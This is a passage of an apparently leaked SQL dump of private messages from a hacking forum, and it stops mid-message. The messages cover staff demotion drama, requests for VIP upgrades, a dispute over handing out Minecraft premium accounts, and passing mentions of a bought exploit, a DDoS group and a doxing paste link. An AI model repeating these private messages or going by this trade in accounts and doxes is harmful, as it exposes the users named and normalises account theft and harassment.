[quote=\'Apathy\'] What\'s up? I do not really feel like going on skype atm:P . Just tell me through pm? [/quote] Yes, PM me back so I know you are online now. [/quote] Online. [/quote] I checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive. I\'m sorry but I have to demote you, but would you like to become a Mod or Elite? [/quote] Are you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me.... [/quote] I understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH. [/quote] And I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats: http://i.imgur.com/CifkV.png 3 posts in the last while.. I have not been active on hf... [/quote] I can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me. [/quote] So I cannot be admin again? Only you and no one else? And staff is second to admin?', '1350706119', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3485', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] What\'s up? I do not really feel like going on skype atm:P . Just tell me through pm? [/quote] Yes, PM me back so I know you are online now. [/quote] Online. [/quote] I checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive. I\'m sorry but I have to demote you, but would you like to become a Mod or Elite? [/quote] Are you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me.... [/quote] I understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH. [/quote] And I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats: http://i.imgur.com/CifkV.png 3 posts in the last while.. I have not been active on hf... [/quote] I can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me. [/quote] So I cannot be admin again? Only you and no one else? And staff is second to admin? [/quote] You can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin [/quote] Alright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. ', '1350706438', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3488', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] What\'s up? I do not really feel like going on skype atm:P . Just tell me through pm? [/quote] Yes, PM me back so I know you are online now. [/quote] Online. [/quote] I checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive. I\'m sorry but I have to demote you, but would you like to become a Mod or Elite? [/quote] Are you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me.... [/quote] I understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH. [/quote] And I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats: http://i.imgur.com/CifkV.png 3 posts in the last while.. I have not been active on hf... [/quote] I can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me. [/quote] So I cannot be admin again? Only you and no one else? And staff is second to admin? [/quote] You can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin [/quote] Alright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. [/quote] Hopefully and I made NXK an admin as I said I require help. [/quote] .... Temp admin?', '1350706782', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3491', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] What\'s up? I do not really feel like going on skype atm:P . Just tell me through pm? [/quote] Yes, PM me back so I know you are online now. [/quote] Online. [/quote] I checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive. I\'m sorry but I have to demote you, but would you like to become a Mod or Elite? [/quote] Are you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me.... [/quote] I understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH. [/quote] And I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats: http://i.imgur.com/CifkV.png 3 posts in the last while.. I have not been active on hf... [/quote] I can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me. [/quote] So I cannot be admin again? Only you and no one else? And staff is second to admin? [/quote] You can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin [/quote] Alright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. [/quote] Hopefully and I made NXK an admin as I said I require help. [/quote] .... Temp admin? [/quote] Idk and don\'t worry about it. [/quote] What do you mean don\'y worry? You said you only want 1 other admin besides you... If he is then I cannot be....:\'(', '1350707495', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3494', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] What\'s up? I do not really feel like going on skype atm:P . Just tell me through pm? [/quote] Yes, PM me back so I know you are online now. [/quote] Online. [/quote] I checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive. I\'m sorry but I have to demote you, but would you like to become a Mod or Elite? [/quote] Are you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me.... [/quote] I understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH. [/quote] And I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats: http://i.imgur.com/CifkV.png 3 posts in the last while.. I have not been active on hf... [/quote] I can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me. [/quote] So I cannot be admin again? Only you and no one else? And staff is second to admin? [/quote] You can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin [/quote] Alright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. [/quote] Hopefully and I made NXK an admin as I said I require help. [/quote] .... Temp admin? [/quote] Idk and don\'t worry about it. [/quote] What do you mean don\'y worry? You said you only want 1 other admin besides you... If he is then I cannot be....:\'( [/quote] Everyone is temp on LH. No one is going to stay on LH forever, I\'m the only one hopefully because I\'m the founder. [/quote] I am co founder. So why would I leave? That is hardly a fair statement. You could also write temp admin in the thread.', '1350707690', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3497', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] What\'s up? I do not really feel like going on skype atm:P . Just tell me through pm? [/quote] Yes, PM me back so I know you are online now. [/quote] Online. [/quote] I checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive. I\'m sorry but I have to demote you, but would you like to become a Mod or Elite? [/quote] Are you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me.... [/quote] I understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH. [/quote] And I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats: http://i.imgur.com/CifkV.png 3 posts in the last while.. I have not been active on hf... [/quote] I can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me. [/quote] So I cannot be admin again? Only you and no one else? And staff is second to admin? [/quote] You can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin [/quote] Alright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. [/quote] Hopefully and I made NXK an admin as I said I require help. [/quote] .... Temp admin? [/quote] Idk and don\'t worry about it. [/quote] What do you mean don\'y worry? You said you only want 1 other admin besides you... If he is then I cannot be....:\'( [/quote] Everyone is temp on LH. No one is going to stay on LH forever, I\'m the only one hopefully because I\'m the founder. [/quote] I am co founder. So why would I leave? That is hardly a fair statement. You could also write temp admin in the thread. [/quote] Yes you are but god forbid something happens or you leave the internet then I\'m the only one who is going to be permanent and the day I leave LH I will make sure I take it down instead of selling it. [/quote] Aright. :P My mom is raging hard I gtg night. :)', '1350707892', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3664', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello', '0', '[quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] hey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks [/quote] Sorry but they don\'t have special awards. [/quote] ok are we allowed to ask for awards because i think i deserve the gaming award :)', '1350862656', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3500', '258', '1', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Forum', '0', '[quote=\'t3h jok3r\'] [quote=\'XTr3ME PiX3L\'] [quote=\'t3h jok3r\'] [quote=\'XTr3ME PiX3L\'] [quote=\'t3h jok3r\'] [quote=\'XTr3ME PiX3L\'] Ok mate i registered , if possible i would like to be Moderator or Staff at your forum :) Im Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852 I have had experience being moderator before at a hacking forum called Eliteguys Here is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L As you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there here is my profile on L33T HACKING : http://l33thacking.net/user-258.html Looking forward to hearing from you [/quote] http://l33thacking.net/misc.php?action=help&hid=17 [/quote] Ok i understand , How about a free upgrade then? You said on ubers that you will provide a free upgrade (VIP membership) if we are active here on this forum I am willing to move ALL MY HQ THREADS from ubers to your forum and remain more active here.. The reason is that recently Crazy4cs (admin and owner of ubers) made it so that only upgraded members (that\'s like 15 dollars) can edit posts and threads and normal users can\'t Ubers is all about money now , i id rather be a part of this community instead of ubers How about it then? i can bring alot of Quality to this place i guarantee you , also you said free upgrade :) [/quote] Sure that would be great but before we upgrade someone we now require two HQ threads. [/quote] Already Done!! , i posted 4 HQ tuts 2 extra :) : http://l33thacking.net/thread-987.html http://l33thacking.net/thread-988.html http://l33thacking.net/thread-989.html http://l33thacking.net/thread-990.html [/quote] I\'ll do it when I get back home, just PM me back so when I check my PMs I know that I have to upgrade your account. [/quote] Alright great!! If you see this PM then be sure to upgrade me mate! :D', '1350711090', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3502', '53', '258', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'skype', '0', 'Hey Whats your skype name? Greetings', '1350736478', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3504', '258', '53', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: skype', '0', '[quote=\'sirchamp\'] Hey Whats your skype name? Greetings [/quote] Sorry mate , i don\'t have skype', '1350736708', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3766', '222', '5', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Pro Doxer- NSA', '0', '[quote=\'Timmy\'] http://pastebin.com/eXVxALWX [/quote] Lmao...who is this...and yeh if you got this ur good :D', '1351044139', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3509', '258', '1', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Forum', '0', '[quote=\'t3h jok3r\'] [quote=\'XTr3ME PiX3L\'] [quote=\'t3h jok3r\'] [quote=\'XTr3ME PiX3L\'] [quote=\'t3h jok3r\'] [quote=\'XTr3ME PiX3L\'] [quote=\'t3h jok3r\'] [quote=\'XTr3ME PiX3L\'] Ok mate i registered , if possible i would like to be Moderator or Staff at your forum :) Im Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852 I have had experience being moderator before at a hacking forum called Eliteguys Here is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L As you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there here is my profile on L33T HACKING : http://l33thacking.net/user-258.html Looking forward to hearing from you [/quote] http://l33thacking.net/misc.php?action=help&hid=17 [/quote] Ok i understand , How about a free upgrade then? You said on ubers that you will provide a free upgrade (VIP membership) if we are active here on this forum I am willing to move ALL MY HQ THREADS from ubers to your forum and remain more active here.. The reason is that recently Crazy4cs (admin and owner of ubers) made it so that only upgraded members (that\'s like 15 dollars) can edit posts and threads and normal users can\'t Ubers is all about money now , i id rather be a part of this community instead of ubers How about it then? i can bring alot of Quality to this place i guarantee you , also you said free upgrade :) [/quote] Sure that would be great but before we upgrade someone we now require two HQ threads. [/quote] Already Done!! , i posted 4 HQ tuts 2 extra :) : http://l33thacking.net/thread-987.html http://l33thacking.net/thread-988.html http://l33thacking.net/thread-989.html http://l33thacking.net/thread-990.html [/quote] I\'ll do it when I get back home, just PM me back so when I check my PMs I know that I have to upgrade your account. [/quote] Alright great!! If you see this PM then be sure to upgrade me mate! :D [/quote] Done. [/quote] Thanks mate!! :) Gonna be posting quite alot 2morrow (its mid night where im at atm)', '1350754341', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3511', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Thread', '0', '[quote=\'t3h jok3r\'] I want to post a thread but thought if you would post it then you would post it then you would get more threads. Post this in the off topic section. Should I implement myawards plugin which can take up to weeks or should I install my achievements and all the previous awards given would be gone. Say that Jok3r told you to post this thread and it\'s an official award system discussion thread. [/quote] Thanks Man <3 What do you think?: http://l33thacking.net/thread-1014.html', '1350755003', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3513', '270', '1', '270', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi there.', '0', '[quote=\'t3h jok3r\'] Hi, How are you today? If you haven\'t received this PM yet, then how do you find L33T Hacking so far? Feel free to share your experience, ideas, feedback anything you like. [/quote] I\'m good. I think LH is awesome we just need a few more members. Can I suggest a dedicated tab to monetizing? I personally would want to make it as active as it can be; a few people know about what I love, and that is online monetizing. Thanks! ', '1350755301', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3576', '257', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'hello', '0', 'would you like a mc premium account regards me', '1350801646', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3583', '258', '257', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\'] would you like a mc premium account regards me [/quote] Nitro_Hitman gave them to you on Ubers He gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it', '1350802093', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3585', '257', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'Re: hello', '0', '[quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] would you like a mc premium account regards me [/quote] Nitro_Hitman gave them to you on Ubers He gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it [/quote] excuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype. so before you get on your high heels calm down,pfft accusing me of leaking ', '1350802268', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3587', '258', '257', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\'] [quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] would you like a mc premium account regards me [/quote] Nitro_Hitman gave them to you on Ubers He gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it [/quote] excuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype. so before you get on your high heels calm down,pfft accusing me of leaking [/quote] O really? care to explain this? : [IMG]http://i.imgur.com/9PrGW.jpg[/IMG] Why would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away ', '1350802645', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3589', '257', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'Re: hello', '0', '[quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] would you like a mc premium account regards me [/quote] Nitro_Hitman gave them to you on Ubers He gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it [/quote] excuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype. so before you get on your high heels calm down,pfft accusing me of leaking [/quote] O really? care to explain this? : [IMG]http://i.imgur.com/9PrGW.jpg[/IMG] Why would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away [/quote] and i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time.', '1350802966', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3591', '257', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'hey', '16', 'hey whats up.if you look on the who\'s online list its me and you and heaps of guest, why can\'t they just sign up', '1350805535', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3593', '258', '257', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\'] [quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] would you like a mc premium account regards me [/quote] Nitro_Hitman gave them to you on Ubers He gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it [/quote] excuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype. so before you get on your high heels calm down,pfft accusing me of leaking [/quote] O really? care to explain this? : [IMG]http://i.imgur.com/9PrGW.jpg[/IMG] Why would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away [/quote] and i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time. [/quote] And why do they give you heaps all the time? EXACTLY!!! your story is a lie', '1350809638', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3595', '257', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'Re: hello', '0', '[quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] would you like a mc premium account regards me [/quote] Nitro_Hitman gave them to you on Ubers He gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it [/quote] excuse me the one i was going to give to you wasnt from nitro hitman so 